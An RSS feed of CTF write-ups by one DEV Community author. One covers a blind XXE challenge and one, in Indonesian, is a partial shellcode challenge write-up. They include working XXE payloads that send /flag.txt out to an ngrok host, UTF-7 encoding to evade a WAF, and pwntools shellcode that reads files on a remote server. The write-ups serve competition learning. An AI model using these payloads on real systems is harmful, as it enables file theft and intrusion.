<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: yudi</title>
    <description>The latest articles on DEV Community by yudi (@yudi7ll).</description>
    <link>https://dev.to/yudi7ll</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F96573%2Fdfd69a03-6052-47d8-ad7e-bf494e1289e0.jpg</url>
      <title>DEV Community: yudi</title>
      <link>https://dev.to/yudi7ll</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/yudi7ll"/>
    <language>en</language>
    <item>
      <title>Web Exploitation - Final ARACTF 2021 Write Up</title>
      <dc:creator>yudi</dc:creator>
      <pubDate>Mon, 22 Mar 2021 16:20:48 +0000</pubDate>
      <link>https://dev.to/yudi7ll/web-exploitation-final-aractf-2021-write-up-43p5</link>
      <guid>https://dev.to/yudi7ll/web-exploitation-final-aractf-2021-write-up-43p5</guid>
      <description>&lt;h1&gt;
  
  
  Under Development
&lt;/h1&gt;

&lt;p&gt;Website ini sesuai judulnya jadi belum layak untuk dionlinekan ( ͡◉ ͜ʖ ͡◉)&lt;/p&gt;

&lt;p&gt;Hint: Do you know about encoding format? How many? If you do let's wrap this challenge&lt;/p&gt;

&lt;h2&gt;
  
  
  Technical Report
&lt;/h2&gt;

&lt;p&gt;When opening the website suddenly the page is redirected to login.php which is a fake form&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu5dbm8qo0ljksfuutlb8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu5dbm8qo0ljksfuutlb8.png" alt="Alt Text" width="800" height="550"&gt;&lt;/a&gt;&lt;br&gt;
so in this case, I use &lt;code&gt;burpsuite&lt;/code&gt; to see what's the content of the index.php&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5tojjrowrx3t63qx0a8n.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5tojjrowrx3t63qx0a8n.png" alt="Alt Text" width="800" height="339"&gt;&lt;/a&gt;&lt;br&gt;
There's an interesting javascript function called &lt;code&gt;sendmessage&lt;/code&gt; that sends xml to &lt;code&gt;/send.php&lt;/code&gt;. The payload should look like this&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight xml"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?xml version="1.0"?&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;root&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;name&amp;gt;&lt;/span&gt;yudi&lt;span class="nt"&gt;&amp;lt;/name&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;email&amp;gt;&lt;/span&gt;test@test.com&lt;span class="nt"&gt;&amp;lt;/email&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;message&amp;gt;&lt;/span&gt;hello world!&lt;span class="nt"&gt;&amp;lt;/message&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/root&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I also found another interesting link to &lt;code&gt;mybest.php&lt;/code&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp3iormc7iwris1do4ov0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp3iormc7iwris1do4ov0.png" alt="Alt Text" width="674" height="386"&gt;&lt;/a&gt;&lt;br&gt;
In that page (mybest.php), I found another hint says &lt;code&gt;/flag.txt&lt;/code&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp7o8i5v9fzagxcm3zhha.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp7o8i5v9fzagxcm3zhha.png" alt="Alt Text" width="370" height="182"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So I guess the xml thing that we see earlier can be used to retrieve file &lt;code&gt;/flag.txt&lt;/code&gt;. let's try it using &lt;code&gt;insomnia&lt;/code&gt; with this payload&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight xml"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?xml version="1.0"?&amp;gt;&lt;/span&gt;
&lt;span class="cp"&gt;&amp;lt;!DOCTYPE root [&amp;lt;!ENTITY test SYSTEM 'file:///flag.txt'&amp;gt;&lt;/span&gt;]&amp;gt;
&lt;span class="nt"&gt;&amp;lt;root&amp;gt;&lt;/span&gt;&lt;span class="ni"&gt;&amp;amp;test;&lt;/span&gt;&lt;span class="nt"&gt;&amp;lt;/root&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;result:&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F68iol6q58k03ew5cwp8l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F68iol6q58k03ew5cwp8l.png" alt="Alt Text" width="522" height="319"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;But, there's another issue:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;I got no output (it's blind)&lt;/li&gt;
&lt;li&gt;WAF reject &lt;code&gt;!DOCTYPE&lt;/code&gt; &lt;code&gt;!ENTITY&lt;/code&gt; &lt;code&gt;!ELEMENT&lt;/code&gt; &lt;code&gt;file://&lt;/code&gt; and &lt;code&gt;.php&lt;/code&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Then I try the out-of-band (OOB) attack method to load a remote resource. &lt;br&gt;
The payload:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight xml"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;!DOCTYPE root [
&amp;lt;!ELEMENT root ANY &amp;gt;&lt;/span&gt;
&lt;span class="cp"&gt;&amp;lt;!ENTITY % flag SYSTEM "http://075a05cf94ed.ngrok.io/dtd.xml"&amp;gt;&lt;/span&gt;
%flag;
%all;
]&amp;gt;
&lt;span class="nt"&gt;&amp;lt;root&amp;gt;&lt;/span&gt;&lt;span class="ni"&gt;&amp;amp;send;&lt;/span&gt;&lt;span class="nt"&gt;&amp;lt;/root&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;dtd.xml&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight xml"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/flag.txt"&amp;gt;&lt;/span&gt;
&lt;span class="cp"&gt;&amp;lt;!ENTITY % all "&amp;lt;!ENTITY send SYSTEM 'http://075a05cf94ed.ngrok.io/%file;'&amp;gt;&lt;/span&gt;"&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;then I encoded all the payload to UTF-7 to bypass the WAF. &lt;br&gt;
The final payload:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight xml"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?xml version="1.0" encoding="utf-7"?&amp;gt;&lt;/span&gt;
+ADwAIQ-DOCTYPE root +AFs
+ADwAIQ-ELEMENT root ANY +AD4
+ADwAIQ-ENTITY +ACU flag SYSTEM +ACI-http://075a05cf94ed.ngrok.io/dtd.xml+ACIAPg
+ACU-flag+ADs
+ACU-all+ADs
+AF0APg
+ADw-root+AD4AJg-send+ADsAPA-/root+AD4
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;dtd.xml&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight xml"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?xml version="1.0" encoding="utf-7"?&amp;gt;&lt;/span&gt;
+ADwAIQ-ENTITY +ACU file SYSTEM +ACI-php://filter/convert.base64-encode/resource=/flag.txt+ACIAPg
+ADwAIQ-ENTITY +ACU all +ACIAPAAh-ENTITY send SYSTEM 'http://075a05cf94ed.ngrok.io/+ACU-file+ADs'+AD4AIgA+
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;result:&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2b8nfegx3av61b6xnb7e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2b8nfegx3av61b6xnb7e.png" alt="Alt Text" width="512" height="105"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkm3bruqzfcaz5xq9x2mq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkm3bruqzfcaz5xq9x2mq.png" alt="Alt Text" width="515" height="33"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;FLAG: ara2021{ezzz_pz_lemon_sqzzzz}&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Final CSC CTF 2020 Write Up</title>
      <dc:creator>yudi</dc:creator>
      <pubDate>Wed, 30 Dec 2020 05:26:54 +0000</pubDate>
      <link>https://dev.to/yudi7ll/csc-ctf-2020-write-up-final-2h28</link>
      <guid>https://dev.to/yudi7ll/csc-ctf-2020-write-up-final-2h28</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh6.googleusercontent.com%2FwS1dKYSSI7meivMBfHAWt3t2tys6NsgOSSa-Adl2CHhFtRG4PFuUG8XGYBQgOZA-81JcIVLp8I6h9gsD1vEGjeNyROYcs5qjKsndPkLDwzrYFVflJtXjiFdTUajXJpp-xnos_hPW" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh6.googleusercontent.com%2FwS1dKYSSI7meivMBfHAWt3t2tys6NsgOSSa-Adl2CHhFtRG4PFuUG8XGYBQgOZA-81JcIVLp8I6h9gsD1vEGjeNyROYcs5qjKsndPkLDwzrYFVflJtXjiFdTUajXJpp-xnos_hPW" alt="Your exploit it's useful" width="638" height="332"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Team Member&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://github.com/ChaO-0" rel="noopener noreferrer"&gt;ChaO&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://github.com/anehman" rel="noopener noreferrer"&gt;AnehMan&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://github.com/yudi7ll" rel="noopener noreferrer"&gt;MBEERRR&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  Daftar Isi
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
Binary Exploitation

&lt;ul&gt;
&lt;li&gt;Babysc&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Reverse Engineering

&lt;ul&gt;
&lt;li&gt;Readme&lt;/li&gt;
&lt;li&gt;Breaker&lt;/li&gt;
&lt;li&gt;Cr4shed&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Web Exploitation

&lt;ul&gt;
&lt;li&gt;Plot&lt;/li&gt;
&lt;li&gt;Authey&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;/ul&gt;




&lt;h1&gt;
  
  
  Binary Exploitation
&lt;/h1&gt;

&lt;h2&gt;
  
  
  Babysc
&lt;/h2&gt;

&lt;p&gt;Diberikan sebuah binary dengan spesifikasi sebagai berikut.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh6.googleusercontent.com%2F48GaNeIm7eCzX_DISTSKz4bB9YoMxeDpUkQ6-o-KQMcAQb36i4rGi4DzUnG3jl0RsdRlM-PqxBUMEJTRNtqsQe-MCjyB4ECUY1argN75bRqBxWx36XW9thsaKLdo0zELayniLS8G" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh6.googleusercontent.com%2F48GaNeIm7eCzX_DISTSKz4bB9YoMxeDpUkQ6-o-KQMcAQb36i4rGi4DzUnG3jl0RsdRlM-PqxBUMEJTRNtqsQe-MCjyB4ECUY1argN75bRqBxWx36XW9thsaKLdo0zELayniLS8G" alt="chal" width="1344" height="166"&gt;&lt;/a&gt;&lt;br&gt;
Terlihat bahwa binary menggunakan arsitektur 64 bit dan security yang ada pada binary tersebut ter-enabled semua. Namun jika dilihat lebih baik di IDA Pro, binary tersebut akan meng-exec shellcode yang akan menjadi inputan kita. Berikut merupakan potongan pseudocode nya.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh3.googleusercontent.com%2FfOL1lv9Kw9DiKzbcXe6sOPckr337H6_2FVp3KNzAER67MRpe0RdEv9Tgrx41FAtjOYXdVNpMhdKT6E0r0EZAClpiGEo69HW8HFwwhFXSV2fQRRb46tnRSycQTwKfypV_gg3JM-pr" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh3.googleusercontent.com%2FfOL1lv9Kw9DiKzbcXe6sOPckr337H6_2FVp3KNzAER67MRpe0RdEv9Tgrx41FAtjOYXdVNpMhdKT6E0r0EZAClpiGEo69HW8HFwwhFXSV2fQRRb46tnRSycQTwKfypV_gg3JM-pr" alt="chal" width="538" height="257"&gt;&lt;/a&gt;&lt;br&gt;
Namun, syscall difilter sedemikian rupa sehingga kita hanya bisa memakai beberapa syscall. Untuk melihat syscall yang bisa / tidak bisa kita pakai, kami menggunakan seccomp-tools. Berikut gambarnya.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh5.googleusercontent.com%2Fq9gAf0DqKiV3xrg7SHfbsMO9WXpZ4ryXSTml3S4KRSWAByoqmvIeUMCr5SaAp3MQGAIt6D8AG3a90jwXDpaaXaPo0NXjR2wetO5seG-aQ0I4dRfB1uuYFzZ1KXXct3sJ63stuvRx" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh5.googleusercontent.com%2Fq9gAf0DqKiV3xrg7SHfbsMO9WXpZ4ryXSTml3S4KRSWAByoqmvIeUMCr5SaAp3MQGAIt6D8AG3a90jwXDpaaXaPo0NXjR2wetO5seG-aQ0I4dRfB1uuYFzZ1KXXct3sJ63stuvRx" alt="binary" width="459" height="304"&gt;&lt;/a&gt;&lt;br&gt;
Dapat dilihat binary hanya bisa melakukan openat, read, write, getdents64, exit, dan exit_group.&lt;/p&gt;

&lt;p&gt;Ide kami adalah untuk melihat unknown_dir terlebih dahulu dengan getdents64 agar kita dapat melihat lokasi dari flag.&lt;/p&gt;

&lt;p&gt;Berikut exploit yang kami buat.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;pwn&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;

&lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;arch&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;amd64&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;

&lt;span class="c1"&gt;# p = process("./babysc")
&lt;/span&gt;
&lt;span class="n"&gt;p&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;remote&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;139.59.97.212&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;23339&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;''&lt;/span&gt;

&lt;span class="c1"&gt;#/home/babysc/55ffa688e1003d7020b4b2b0e84b85fc/flag.txt
&lt;/span&gt;
&lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="nf"&gt;asm&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcraft&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;openat&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;/home/babysc/&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

&lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="nf"&gt;asm&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcraft&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;getdents64&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;rax&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;rsp&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mh"&gt;0x100&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

&lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="nf"&gt;asm&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcraft&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;rsp&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mh"&gt;0x100&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

&lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;sendline&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;interactive&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Pertama, kami lakukan list directory pada /home/babysc untuk melihat nama directory yg unknown tersebut. Berikut outputnya.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh6.googleusercontent.com%2FPuQ7YoKv23_gJo1squUfGkRo_XxjRJbAuxalTcJFcLeK-svNK9mF5F4CyMXy7KQ4F9GX0rtpSl-ybZU9uSYWrkqgxV7pTXHiTCzv8qS4CAUCGFeX5wFKL4_dKuZn25pvAnBYuvAk" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh6.googleusercontent.com%2FPuQ7YoKv23_gJo1squUfGkRo_XxjRJbAuxalTcJFcLeK-svNK9mF5F4CyMXy7KQ4F9GX0rtpSl-ybZU9uSYWrkqgxV7pTXHiTCzv8qS4CAUCGFeX5wFKL4_dKuZn25pvAnBYuvAk" alt="pwn" width="953" height="192"&gt;&lt;/a&gt;&lt;br&gt;
Sekarang sudah terlihat bahwa nama directory yang tidak diketahui tersebut adalah 55ffa688e1003d7020b4b2b0e84b85fc. Jika kita lihat lagi isi dari directory tersebut, akan terdapat file flag.txt. Selanjutnya tinggal kita baca saja isi dari flag tersebut dengan openat, read, write. Berikut exploit yang kami buat.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;pwn&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;

&lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;arch&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;amd64&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;

&lt;span class="c1"&gt;# p = process("./babysc")
&lt;/span&gt;
&lt;span class="n"&gt;p&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;remote&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;139.59.97.212&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;23339&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;''&lt;/span&gt;

&lt;span class="c1"&gt;#/home/babysc/55ffa688e1003d7020b4b2b0e84b85fc/flag.txt
&lt;/span&gt;
&lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="nf"&gt;asm&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcraft&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;openat&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;/home/babysc/55ffa688e1003d7020b4b2b0e84b85fc/flag.txt&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

&lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="nf"&gt;asm&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcraft&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;read&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;rax&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;rsp&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mh"&gt;0x100&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

&lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="nf"&gt;asm&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcraft&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;rsp&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mh"&gt;0x100&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

&lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;sendline&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;interactive&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



